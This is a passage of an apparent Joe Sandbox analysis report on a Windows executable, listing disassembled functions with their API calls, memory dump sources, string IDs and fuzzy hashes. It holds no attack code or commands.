                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00590479
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2706829360-0
                                                                                                                                                      • Opcode ID: f1e548f54091a5badb66fb416b379b9193f773f91771c49aa827ea198a1060b6
                                                                                                                                                      • Instruction ID: 0b0c4b0ac4b4d794bc7f86e108c951c50889cf3f018a8b49f3270ddcfa618c0f
                                                                                                                                                      • Opcode Fuzzy Hash: f1e548f54091a5badb66fb416b379b9193f773f91771c49aa827ea198a1060b6
                                                                                                                                                      • Instruction Fuzzy Hash: 63416375A00219DFCF04DF64C888DAEBFB9FF58344F008429EA59E72A1D770A945DBA0
                                                                                                                                                      Function 005A8AEF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 005A8BB1
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 005A8BC1
                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 005A8BCD
                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005A8C6A
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 005A8C7E
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 005A8CB0
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 005A8CE6
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 005A8CEF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                      • String ID: *.*
                                                                                                                                                      • API String ID: 1464919966-438819550
                                                                                                                                                      • Opcode ID: 989b6d1a395d8c265e759b29ec76870e4502feacca76b5d47c7ea1806a455854
                                                                                                                                                      • Instruction ID: 44d8cd8f59901c21e5676e6fc97c56921f6cf2d4170a60d1ae10a370514091a8
                                                                                                                                                      • Opcode Fuzzy Hash: 989b6d1a395d8c265e759b29ec76870e4502feacca76b5d47c7ea1806a455854
                                                                                                                                                      • Instruction Fuzzy Hash: BB614CB25047069FC710EF60C8499AEBBE8FF89310F04481DF989D7251DB35E945CB62
                                                                                                                                                      Function 0059C53A Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 137windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0059C5D9
                                                                                                                                                      • IsMenu.USER32(00000000), ref: 0059C5F9
                                                                                                                                                      • CreatePopupMenu.USER32 ref: 0059C62F
                                                                                                                                                      • GetMenuItemCount.USER32(pb), ref: 0059C680
                                                                                                                                                      • InsertMenuItemW.USER32(pb,?,00000001,00000030), ref: 0059C6A8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                      • String ID: 0$2$pb$pb
                                                                                                                                                      • API String ID: 93392585-3013000517
                                                                                                                                                      • Opcode ID: afc30364c4d19150e7f75b448a71ed7b08173816c22e837d0602ce8112c783e7
                                                                                                                                                      • Instruction ID: f604227849df97f2fb9f586084f9f48ce012c01bc57e39f2b8b3fc5131104025
                                                                                                                                                      • Opcode Fuzzy Hash: afc30364c4d19150e7f75b448a71ed7b08173816c22e837d0602ce8112c783e7
                                                                                                                                                      • Instruction Fuzzy Hash: AB519B71A00205ABDF20CF6CC988BAEBFF9BF58314F245569E911DB2A1E7709944CB61
                                                                                                                                                      Function 0059276F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                        • Part of subcall function 00594536: GetClassNameW.USER32(?,?,000000FF), ref: 00594559
                                                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 005927F4
                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 005927FF
                                                                                                                                                      • GetParent.USER32 ref: 0059281B
                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0059281E
                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00592827
                                                                                                                                                      • GetParent.USER32(?), ref: 0059283B
                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0059283E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                      • API String ID: 711023334-1403004172
                                                                                                                                                      • Opcode ID: 1bb551b8d4541947edacba5de267deacf1bcec2a51a7225f91722d9bd7ddf4fc
                                                                                                                                                      • Instruction ID: bc5cec2a0acf2be9b943e4ea3202eab9932eaf7cde96bbfdee2751011dca86ee
                                                                                                                                                      • Opcode Fuzzy Hash: 1bb551b8d4541947edacba5de267deacf1bcec2a51a7225f91722d9bd7ddf4fc
                                                                                                                                                      • Instruction Fuzzy Hash: 6C21BE74900219BFCF15ABA0CC89EEEBFB9FF55310F000516BA51A72A2CB794809DB60
                                                                                                                                                      Function 00592850 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                        • Part of subcall function 00594536: GetClassNameW.USER32(?,?,000000FF), ref: 00594559
                                                                                                                                                      • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 005928D3
                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 005928DE
                                                                                                                                                      • GetParent.USER32 ref: 005928FA
                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 005928FD
                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00592906
                                                                                                                                                      • GetParent.USER32(?), ref: 0059291A
                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0059291D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                      • API String ID: 711023334-1403004172
                                                                                                                                                      • Opcode ID: a370af27d353c8322d5551cbbd6aeb88fda5235ab7706a7164fd1e561ff76bd6
                                                                                                                                                      • Instruction ID: 9f2f1fa7bdcc82c22c24aa17d5a9743a25bed533d6dc0c2ae14836e5e6d97a3b
                                                                                                                                                      • Opcode Fuzzy Hash: a370af27d353c8322d5551cbbd6aeb88fda5235ab7706a7164fd1e561ff76bd6
                                                                                                                                                      • Instruction Fuzzy Hash: E521BE75900218BBDF11ABA0DC89EFEBFB8FF14300F004416BA51A72A5DB794849DB60
                                                                                                                                                      Function 005C87FD Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • IsWindow.USER32(00000000), ref: 005C8896
                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 005C88A2
                                                                                                                                                      • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 005C897D
                                                                                                                                                      • SendMessageW.USER32(00000000,000000B0,?,?), ref: 005C89B0
                                                                                                                                                      • IsDlgButtonChecked.USER32(?,00000000), ref: 005C89E8
                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 005C8A0A
                                                                                                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 005C8A22
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                      • String ID: Hb
                                                                                                                                                      • API String ID: 4072528602-1270690246
                                                                                                                                                      • Opcode ID: dce462db65ab4c98af0f1890058d30c33216f70be5bd9a1f1e2789e991dbc24f
                                                                                                                                                      • Instruction ID: 5821af90f05635373bcfcc640c9106bdf22760b2247a4cd672890b765335d070
                                                                                                                                                      • Opcode Fuzzy Hash: dce462db65ab4c98af0f1890058d30c33216f70be5bd9a1f1e2789e991dbc24f
                                                                                                                                                      • Instruction Fuzzy Hash: E271BA34604205AFEF259F95C898FBABFB9FF4A310F14486DE84593261CB31AD85DB11
                                                                                                                                                      Function 005ACBB0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 005ACBCF
                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005ACBF7
                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 005ACC27
                                                                                                                                                      • GetLastError.KERNEL32 ref: 005ACC7F
                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 005ACC93
                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 005ACC9E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3113390036-3916222277
                                                                                                                                                      • Opcode ID: 454c190590df279d7343f8154813d9b1ca4f269e19c46d06c17e037e2d063b08
                                                                                                                                                      • Instruction ID: 2ae88db0059c8972f6e4f301067f627e76a0aabab673d5a157587ebbbe462371
                                                                                                                                                      • Opcode Fuzzy Hash: 454c190590df279d7343f8154813d9b1ca4f269e19c46d06c17e037e2d063b08
                                                                                                                                                      • Instruction Fuzzy Hash: 1E317AB5500608AFD7219F658998AAF7FFCFB5A754B10092EE45AD6200DB34DD089BB0
                                                                                                                                                      Function 0059A12A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00575437,?,?,Bad directive syntax error,005CDCD0,00000000,00000010,?,?), ref: 0059A14B
                                                                                                                                                      • LoadStringW.USER32(00000000,?,00575437,?), ref: 0059A152
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0059A216
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                      • API String ID: 858772685-4153970271
                                                                                                                                                      • Opcode ID: 597d7f02c49c00976bd398586c205f7a2a3151e2220f149140d2bbe9990052dd
                                                                                                                                                      • Instruction ID: 82368fd84d9e9abbf08420fbf1a96b5818be3674de5d5b48d6c33b2c36dbf440
                                                                                                                                                      • Opcode Fuzzy Hash: 597d7f02c49c00976bd398586c205f7a2a3151e2220f149140d2bbe9990052dd
                                                                                                                                                      • Instruction Fuzzy Hash: 3F215E3180021EBFDF16AF90CC0AEEE7F79BF58304F044465F615660A2DB759A18EB61
                                                                                                                                                      Function 0059292F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetParent.USER32 ref: 0059293B
                                                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00592950
                                                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 005929DD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClassMessageNameParentSend
                                                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                      • API String ID: 1290815626-3381328864
                                                                                                                                                      • Opcode ID: 302f4cd874edd789d48b0402936a091d633ae6eaa2404331e92e468cf6f4c510
                                                                                                                                                      • Instruction ID: 7067c146698a27e22abe78effdda05e590a24e73581a0a2863d9f4c24b6393e0
                                                                                                                                                      • Opcode Fuzzy Hash: 302f4cd874edd789d48b0402936a091d633ae6eaa2404331e92e468cf6f4c510
                                                                                                                                                      • Instruction Fuzzy Hash: 13119E7628870BBAEF002620AC1ADB67FACBB15724F200027FA01E50D1EA6668C55A54
                                                                                                                                                      Function 005ACAA0 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005ACADF
                                                                                                                                                      • GetLastError.KERNEL32 ref: 005ACAF2
                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 005ACB06
                                                                                                                                                        • Part of subcall function 005ACBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 005ACBCF
                                                                                                                                                        • Part of subcall function 005ACBB0: GetLastError.KERNEL32 ref: 005ACC7F
                                                                                                                                                        • Part of subcall function 005ACBB0: SetEvent.KERNEL32(?), ref: 005ACC93
                                                                                                                                                        • Part of subcall function 005ACBB0: InternetCloseHandle.WININET(00000000), ref: 005ACC9E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 337547030-0
                                                                                                                                                      • Opcode ID: 00bb0f043988fdc5c809a5a2aec8a8d5efb9d8768db209091415e612411118c7
                                                                                                                                                      • Instruction ID: 817038e4b6141eac4ae893b430c4f945a984709120f8a1ce12130435c9c3330d
                                                                                                                                                      • Opcode Fuzzy Hash: 00bb0f043988fdc5c809a5a2aec8a8d5efb9d8768db209091415e612411118c7
                                                                                                                                                      • Instruction Fuzzy Hash: C1317A75200A09AFDB219F65DD49A6ABFF8FF5A300B40482DF856C6610D736E815EBB0
                                                                                                                                                      Function 00592093 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00591CD9,?,?,00000000), ref: 0059209C
                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00591CD9,?,?,00000000), ref: 005920A3
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00591CD9,?,?,00000000), ref: 005920B8
                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00591CD9,?,?,00000000), ref: 005920C0
                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00591CD9,?,?,00000000), ref: 005920C3
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00591CD9,?,?,00000000), ref: 005920D3
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00591CD9,00000000,?,00591CD9,?,?,00000000), ref: 005920DB
                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00591CD9,?,?,00000000), ref: 005920DE
                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00592104,00000000,00000000,00000000), ref: 005920F8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1957940570-0
                                                                                                                                                      • Opcode ID: beb3c083bc072eb5250320cf558846c29467c7e9b93a7b436b16d46ad3bbd7d6
                                                                                                                                                      • Instruction ID: a7e3e68b4c160a1ac79952087fc6463f96760a09ed714b1c195d911656a3802c
                                                                                                                                                      • Opcode Fuzzy Hash: beb3c083bc072eb5250320cf558846c29467c7e9b93a7b436b16d46ad3bbd7d6
                                                                                                                                                      • Instruction Fuzzy Hash: 2101FBB5240708BFE710ABA5DC4DF6B3BBCEB98710F054420FA04DB1A1CA719804DB30
                                                                                                                                                      Function 0059CD90 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00534154: _wcslen.LIBCMT ref: 00534159
                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0059CEAE
                                                                                                                                                      • _wcslen.LIBCMT ref: 0059CEF5
                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0059CF5C
                                                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0059CF8A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                      • String ID: 0$pb$pb
                                                                                                                                                      • API String ID: 1227352736-318905209
                                                                                                                                                      • Opcode ID: 4bef5a29849f59b46657b19d3f8d3ddc2752f5f16551bc4b6115a91982f7dfc4
                                                                                                                                                      • Instruction ID: 62c347d1a6b41315a8418ba56eca5f2a33a5ece4cf04bb6d8c05275d59caeb02
                                                                                                                                                      • Opcode Fuzzy Hash: 4bef5a29849f59b46657b19d3f8d3ddc2752f5f16551bc4b6115a91982f7dfc4
                                                                                                                                                      • Instruction Fuzzy Hash: ED51DD716043029FDB159F28C888B6BBFE9BF89354F040A2EF995D62E0DB70C944CB52
                                                                                                                                                      Function 005BAA41 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0059DC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 0059DCC1
                                                                                                                                                        • Part of subcall function 0059DC9C: Process32FirstW.KERNEL32(00000000,?), ref: 0059DCCF
                                                                                                                                                        • Part of subcall function 0059DC9C: CloseHandle.KERNELBASE(00000000), ref: 0059DD9C
                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005BAACC
                                                                                                                                                      • GetLastError.KERNEL32 ref: 005BAADF
                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005BAB12
